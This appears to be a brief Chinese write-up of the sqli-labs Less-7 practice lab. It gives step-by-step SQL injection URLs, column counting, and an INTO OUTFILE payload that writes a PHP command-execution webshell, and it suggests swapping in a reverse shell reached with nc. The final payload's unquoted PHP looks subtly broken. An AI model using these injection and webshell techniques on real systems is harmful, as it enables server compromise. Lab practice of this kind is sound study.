题目说是上传文件,可以上传一个 php 反弹 shell,kali 开启 nc 连上就 OK
http://sqlilabs/Less-7/?id=1'
回显报错
http://sqlilabs/Less-7/?id=1'--+
回显报错
http://sqlilabs/Less-7/?id=1')--+
回显报错
http://sqlilabs/Less-7/?id=1'))--+
回显正常
http://sqlilabs/Less-7/?id=1')) order by 3
回显正常
http://sqlilabs/Less-7/?id=1')) order by 4
回显报错
http://sqlilabs/Less-7/?id=1')) union select 1,2,3 into outfile "D:\phpstudy_pro\WWW\sqlilabs\Less-7\haha.txt"--+
尝试写入
http://sqlilabs/Less-7/?id=1')) union select 1,2,<?php $a = system("dir",$out);print_r($a);print_r($out);?> into outfile "D:\phpstudy_pro\WWW\sqlilabs\Less-7\test.php"%23
写入执行命令
将 <?php $a = system("dir",$out);print_r($a);print_r($out);?> 换成反弹 shell 即可
打开页面http://sqlilabs/Less-7/test.php
nc 连接即可
😄